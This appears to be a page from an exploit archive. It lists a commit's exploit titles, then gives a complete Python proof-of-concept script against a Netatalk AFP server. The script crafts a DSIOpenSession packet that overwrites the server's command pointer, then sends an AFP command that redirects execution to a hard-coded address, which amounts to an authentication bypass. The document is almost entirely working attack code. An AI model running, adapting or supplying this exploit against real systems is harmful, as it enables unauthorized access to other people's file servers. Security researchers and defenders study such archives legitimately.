d622832ea0
21 changes to exploits/shellcodes KnFTP 1.0.0 Server - Multiple Buffer Overflows (Denial of Service) (SEH) (PoC) KnFTP 1.0.0 Server - Multiple Buffer Overflows (PoC) (SEH) Jzip - Buffer Overflow (Denial of Service) (SEH Unicode) Jzip - Buffer Overflow (PoC) (SEH Unicode) Mediacoder 0.8.33 build 5680 - '.m3u' Buffer Overflow (Denial of Service) (SEH) (PoC) Mediacoder 0.8.33 build 5680 - '.lst' Buffer Overflow (Denial of Service) (SEH) (PoC) Mediacoder 0.8.33 build 5680 - '.m3u' Buffer Overflow (PoC) (SEH Overwrite) Mediacoder 0.8.33 build 5680 - '.lst' Buffer Overflow (PoC) (SEH Overwrite) STIMS Buffer 1.1.20 - Buffer Overflow (Denial of Service) (SEH) (PoC) STIMS Buffer 1.1.20 - Buffer Overflow (PoC) (SEH Overwrite) Zortam Mp3 Media Studio 20.15 - Overflow (SEH) (Denial of Service) Zortam Mp3 Media Studio 20.15 - Overflow (PoC) (SEH) Netatalk 3.1.12 - Authentication Bypass (PoC) IP-Tools 2.50 - Denial of Service SEH Overwrite (PoC) Necrosoft DIG 0.4 - Denial of Service SEH Overwrite (PoC) IP-Tools 2.50 - Local Buffer Overflow (PoC) Necrosoft DIG 0.4 - Buffer Overflow (PoC) (SEH Overwrite) FlexHEX 2.46 - Denial of Service SEH Overwrite (PoC) FlexHEX 2.46 - Buffer Overflow (PoC) (SEH Overwrite) Remote Process Explorer 1.0.0.16 - Denial of Service SEH Overwrite (PoC) Remote Process Explorer 1.0.0.16 - Buffer Overflow (PoC) (SEH Overwrite) AirDroid 4.2.1.6 - Denial of Service FutureDj Pro 1.7.2.0 - Denial of Service NordVPN 6.19.6 - Denial of Service (PoC) River Past Video Cleaner 7.6.3 - Local Buffer Overflow (SEH) IP-Tools 2.5 - Local Buffer Overflow (SEH) (Egghunter) River Past Cam Do 3.7.6 - Local Buffer Overflow (SEH) Evince - CBT File Command Injection (Metasploit) Avast Anti-Virus < 19.1.2360 - Local Credentials Disclosure Netatalk - Bypass Authentication Adobe Flash Player - DeleteRangeTimelineOperation Type Confusion (Metasploit) NUUO NVRmini - upgrade_handle.php Remote Command Execution (Metasploit) Indusoft Web Studio 8.1 SP2 - Remote Code Execution Smoothwall Express 3.1-SP4 - Cross-Site Scripting Coship Wireless Router 4.0.0.x/5.0.0.x - WiFi Password Reset IPFire 2.21 - Cross-Site Scripting MyBB Bans List 1.0 - Cross-Site Scripting VA MAX 8.3.4 - Authenticated Remote Code Execution CentOS Web Panel 0.9.8.763 - Persistent Cross-Site Scripting Webiness Inventory 2.3 - 'email' SQL Injection
44 lines
No EOL
1.7 KiB
Python
Executable file
44 lines
No EOL
1.7 KiB
Python
Executable file
import socket
|
|
import struct
|
|
import sys
|
|
if len(sys.argv) != 3:
|
|
sys.exit(0)
|
|
ip = sys.argv[1]
|
|
port = int(sys.argv[2])
|
|
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
print "[+] Attempting connection to " + ip + ":" + sys.argv[2]
|
|
sock.connect((ip, port))
|
|
dsi_payload = "\x00\x00\x40\x00" # client quantum
|
|
dsi_payload += '\x00\x00\x00\x00' # overwrites datasize
|
|
dsi_payload += struct.pack("I", 0xdeadbeef) # overwrites quantum
|
|
dsi_payload += struct.pack("I", 0xfeedface) # overwrites the ids
|
|
dsi_payload += struct.pack("Q", 0x63b660) # overwrite commands ptr
|
|
dsi_opensession = "\x01" # attention quantum option
|
|
dsi_opensession += struct.pack("B", len(dsi_payload)) # length
|
|
dsi_opensession += dsi_payload
|
|
dsi_header = "\x00" # "request" flag
|
|
dsi_header += "\x04" # open session command
|
|
dsi_header += "\x00\x01" # request id
|
|
dsi_header += "\x00\x00\x00\x00" # data offset
|
|
dsi_header += struct.pack(">I", len(dsi_opensession))
|
|
dsi_header += "\x00\x00\x00\x00" # reserved
|
|
dsi_header += dsi_opensession
|
|
sock.sendall(dsi_header)
|
|
resp = sock.recv(1024)
|
|
print "[+] Open Session complete"
|
|
afp_command = "\x01" # invoke the second entry in the table
|
|
afp_command += "\x00" # protocol defined padding
|
|
afp_command += "\x00\x00\x00\x00\x00\x00" # pad out the first entry
|
|
afp_command += struct.pack("Q", 0x4295f0) # address to jump to
|
|
dsi_header = "\x00" # "request" flag
|
|
dsi_header += "\x02" # "AFP" command
|
|
dsi_header += "\x00\x02" # request id
|
|
dsi_header += "\x00\x00\x00\x00" # data offset
|
|
dsi_header += struct.pack(">I", len(afp_command))
|
|
dsi_header += '\x00\x00\x00\x00' # reserved
|
|
dsi_header += afp_command
|
|
print "[+] Sending get server info request"
|
|
sock.sendall(dsi_header)
|
|
resp = sock.recv(1024)
|
|
print resp
|
|
print "[+] Fin." |